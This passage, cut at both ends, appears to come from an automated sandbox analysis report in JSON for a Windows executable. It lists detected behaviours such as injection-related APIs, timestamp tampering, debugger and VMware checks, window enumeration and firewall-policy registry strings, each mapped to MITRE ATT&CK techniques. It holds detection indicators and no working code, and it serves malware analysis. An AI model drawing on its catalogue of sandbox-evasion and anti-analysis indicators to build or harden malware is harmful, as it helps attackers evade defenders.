\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-409", "type": 2, "relevance": 1, "name": "Contains ability to set file time (API string)", "description": "Found reference to API \"SetFileTime\" (Indicator: \"SetFileTime\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"SetFileTime\" (Indicator: \"SetFileTime\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-145", "type": 2, "relevance": 1, "name": "Found virtual disk drive like strings", "description": "Found string - \\\\.\\NTICE; Source: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string - \\\\.\\NTICE; Source: \"00000000-00005224.00000000.139261.00423000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-183", "type": 2, "relevance": 1, "name": "Contains ability to check debugger is running (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-148", "type": 2, "relevance": 1, "name": "Contains ability to register a top-level exception handler (API string)", "description": "Found reference to API \"UnhandledExceptionFilter\" (Indicator: \"UnhandledExceptionFilter\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-249", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file time (API string)", "description": "Found reference to API \"GetFileTime\" (Indicator: \"GetFileTime\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetFileTime\" (Indicator: \"GetFileTime\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-171", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the OS information (API string)", "description": "Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetVersion\" (Indicator: \"GetVersion\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"GetVersion\" (Indicator: \"GetVersion\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-312", "type": 2, "relevance": 1, "name": "Contains ability to retrieve path in which Windows is installed (API string)", "description": "Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-141", "type": 2, "relevance": 1, "name": "Contains ability to retrieve open application windows (API string)", "description": "Found reference to API \"GetForegroundWindow\" (Indicator: \"GetForegroundWindow\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"EnumWindows\" (Indicator: \"EnumWindows\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetWindowTextA\" (Indicator: \"GetWindowText\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; Source: \"00000000-00005224.00000000.139255.0041A000.00000040.mdmp\")\n Found reference to API \"GetWindowTextA\" (Indicator: \"GetWindowText\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"GetForegroundWindow\" (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"EnumWindows\" (Indicator: \"EnumWindows\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-351", "type": 2, "relevance": 1, "name": "Found registry location string related to processor", "description": "Observed string: \"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\" (Indicator: \"hardware\\description\\system\\centralprocessor\") in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n Observed string: \"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\" (Indicator: \"hardware\\description\\system\\centralprocessor\") in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-247", "type": 2, "relevance": 1, "name": "Contains ability to retrieve machine time (API string)", "description": "Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-365", "type": 2, "relevance": 1, "name": "Contains ability to perform scheduled transfer (API string)", "description": "Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-248", "type": 2, "relevance": 1, "name": "Contains ability to retrieve machine timezone (API string)", "description": "Found reference to API \"GetTimeZoneInformation\" (Indicator: \"GetTimeZoneInformation\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetTimeZoneInformation\" (Indicator: \"GetTimeZoneInformation\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetLocalTime@KERNEL32.DLL directly followed by \"cmp byte ptr [esi], 00h\" and \"je 0040FD78h\" at 00000000-00005224-52447-373-0040FD45\n Found API call GetVersionExA@KERNEL32.DLL directly followed by \"cmp dword ptr [ebp-00000084h], 02h\" and \"jne 0040C5D5h\" at 00000000-00005224-52447-342-0040C57F\n Found API call GetLocalTime@KERNEL32.DLL directly followed by \"cmp esi, 01h\" and \"jne 00403A02h\" at 00000000-00005224-52447-647-00403651\n Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, ebx\" and \"je 0041325Dh\" at 00000000-00005224-52447-380-00413005\n Found API call GetSystemTime@KERNEL32.DLL directly followed by \"cmp ax, word ptr [0042EFBAh]\" and \"jne 00411462h\" at 00000000-00005224-52447-398-004113FD", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-87", "type": 1, "relevance": 3, "name": "Contains ability to detect virtual environment (API)", "description": "GetTickCount@KERNEL32.DLL at 00000000-00005224-52447-490-004051C1\n GetTickCount@KERNEL32.DLL at 00000000-00005224-52447-367-0040F206\n GetTickCount@KERNEL32.DLL at 00000000-00005224-52447-346-0040CFCD\n GetTickCount@KERNEL32.DLL at 00000000-00005224-52447-250-0040DD5A\n GlobalMemoryStatus@KERNEL32.DLL at 00000000-00005224-52447-329-0040B111\n GetTickCount@KERNEL32.DLL at 00000000-00005224-52447-640-0040CD2E\n GetTickCount@KERNEL32.DLL at 00000000-00005224-52447-332-0040B589\n GetTickCount@KERNEL32.DLL at 00000000-00005224-52447-330-0040C9A0\n GetTickCount@KERNEL32.DLL at 00000000-00005224-52447-358-0040E3BB\n GetTickCount@KERNEL32.DLL at 00000000-00005224-52447-294-0040AE63", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-3", "type": 1, "relevance": 1, "name": "Contains ability to query the machine version", "description": "GetVersion@KERNEL32.DLL at 00000000-00005224-52447-402-00411FA7\n GetVersionExA@KERNEL32.DLL at 00000000-00005224-52447-255-0040AEDD\n GetVersionExA@KERNEL32.DLL at 00000000-00005224-52447-426-004141B2\n GetVersionExA@KERNEL32.DLL at 00000000-00005224-52447-342-0040C57F\n GetVersionExA@KERNEL32.DLL at 00000000-00005224-52447-245-00402059\n GetVersionExA@KERNEL32.DLL at 00000000-00005224-52447-329-0040B111\n GetVersionExA@KERNEL32.DLL at 00000000-00005224-52447-649-00405B0C", "origin": "Hybrid Analysis Technology", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-167", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the contents of the STARTUPINFO structure (API string)", "description": "Found reference to API \"GetStartupInfoA\" (Indicator: \"GetStartupInfo\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")", "origin": "File/Memory", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-661", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using user activity (API string)", "description": "Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-193", "type": 2, "relevance": 1, "name": "Contains ability to query volume/memory size (API string)", "description": "Found reference to API \"GlobalMemoryStatus\" (Indicator: \"GlobalMemoryStatus\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GlobalMemoryStatus\" (Indicator: \"GlobalMemoryStatus\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-48", "type": 1, "relevance": 1, "name": "Contains ability to query the machine timezone", "description": "GetTimeZoneInformation@KERNEL32.DLL at 00000000-00005224-52447-380-00413005\n GetTimeZoneInformation@KERNEL32.DLL at 00000000-00005224-52447-398-004113FD", "origin": "Hybrid Analysis Technology", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-668", "type": 2, "relevance": 1, "name": "Able to identify virtual environment using sandbox registry", "description": "Found string \"SOFTWARE\\VMware, Inc.\\VMware Tools\" (Indicator: \"software\\vmware, inc.\\vmware tools\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"SOFTWARE\\VMware, Inc.\\VMware Tools\" (Indicator: \"software\\vmware, inc.\\vmware tools\"; Source: \"00000000-00005224.00000000.139261.00423000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"IsWow64Process\" with parameter \"5224\" - (UID: 00000000-00005224)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-152", "type": 6, "relevance": 3, "name": "Calls an API typically used to enumerate active windows", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"EnumWindows\" with parameter \"0\" - (UID: 00000000-00005224)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005224)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-2", "type": 1, "relevance": 1, "name": "Contains ability to query machine time", "description": "GetLocalTime@KERNEL32.DLL at 00000000-00005224-52447-373-0040FD45\n GetLocalTime@KERNEL32.DLL at 00000000-00005224-52447-300-0041014A\n GetLocalTime@KERNEL32.DLL at 00000000-00005224-52447-288-004101E6\n GetLocalTime@KERNEL32.DLL at 00000000-00005224-52447-647-00403651\n GetLocalTime@KERNEL32.DLL at 00000000-00005224-52447-398-004113FD", "origin": "Hybrid Analysis Technology", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-89", "type": 1, "relevance": 3, "name": "Contains ability to enumerate files inside a directory", "description": "FindFirstFileA@KERNEL32.DLL at 00000000-00005224-52447-335-0040BBAF\n FindFirstFileA@KERNEL32.DLL at 00000000-00005224-52447-331-0040B4AF", "origin": "Hybrid Analysis Technology", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "Found reference to API \"PostMessageA\" (Indicator: \"postmessage\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"EnumWindows\" (Indicator: \"enumwindows\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"EnumChildWindows\" (Indicator: \"enumchildwindows\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"PostMessageA\" (Indicator: \"postmessage\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"EnumChildWindows\" (Indicator: \"enumchildwindows\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"EnumWindows\" (Indicator: \"enumwindows\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-415", "type": 2, "relevance": 1, "name": "Found registry location string related to firewall policy", "description": "Found string \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\" (Indicator: \"services\\sharedaccess\\parameters\\firewallpolicy\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\" (Indicator: \"services\\sharedaccess\\parameters\\firewallpolicy\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\" (Indicator: \"services\\sharedaccess\\parameters\\firewallpolicy\"; Source: \"00000000-00005224.00000000.139261.00423000.00000040.mdmp\")\n Found string \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\" (Indicator: \"services\\sharedaccess\\parameters\\firewallpolicy\"; Source: \"00000000-00005224.00000000.139261.00423000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetWindowTextA\" (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetWindowTextA\" with parameter \"CiceroUIWndFrame\" - (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetWindowTextA\" with parameter \"Start\" - (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetWindowTextA\" with parameter \"Network Flyout\" - (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetWindowTextA\" with parameter \"Task Switching\" - (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetWindowTextA\" with parameter \"Start menu\" - (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"GetWindowTextA\" with parameter \"TF_FloatingLangBar_WndTitle\" - (UID: 00000000-00005224)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"RtlGetNtProductType\" (UID: 00000000-00005224)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-31", "type": 1, "relevance": 1, "name": "Contains ability to retrieve/open a process", "description": "GetProcessHeap@KERNEL32.DLL at 00000000-00005224-52447-250-0040DD5A\n OpenProcessToken@ADVAPI32.DLL at 00000000-00005224-52447-209-0040D8F3\n GetProcessHeap@KERNEL32.DLL at 00000000-00005224-52447-251-0040DEFC", "origin": "Hybrid Analysis Technology", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-237", "type": 2, "relevance": 1, "name": "Contains ability to retrieve event logs (API string)", "description": "Found reference to API \"OpenEventLogA\" (Indicator: \"OpenEventLog\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"OpenEventLogA\" (Indicator: \"OpenEventLog\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-534", "type": 2, "name": "Contains ability to read files (API string)", "description": "Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetCurrentDirectoryA\" (Indicator: \"GetCurrentDirectory\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"GetCurrentDirectoryA\" (Indicator: \"GetCurrentDirectory\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-84", "type": 2, "relevance": 1, "name": "Contains ability to find logical drives of the machine (API string)", "description": "Found reference to API \"GetLogicalDriveStringsA\" (Indicator: \"GetLogicalDriveStrings\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetLogicalDriveStringsA\" (Indicator: \"GetLogicalDriveStrings\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-121", "type": 2, "relevance": 1, "name": "Contains ability to retrieve usernames and/or user information (API string)", "description": "Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"GetUserNameA\" (Indicator: \"GetUserName\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"GetUserNameA\" (Indicator: \"GetUserName\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-229", "type": 2, "relevance": 1, "name": "Contains ability to query registry keys (API string)", "description": "Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-164", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the fully qualified path of module (API string)", "description": "Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API 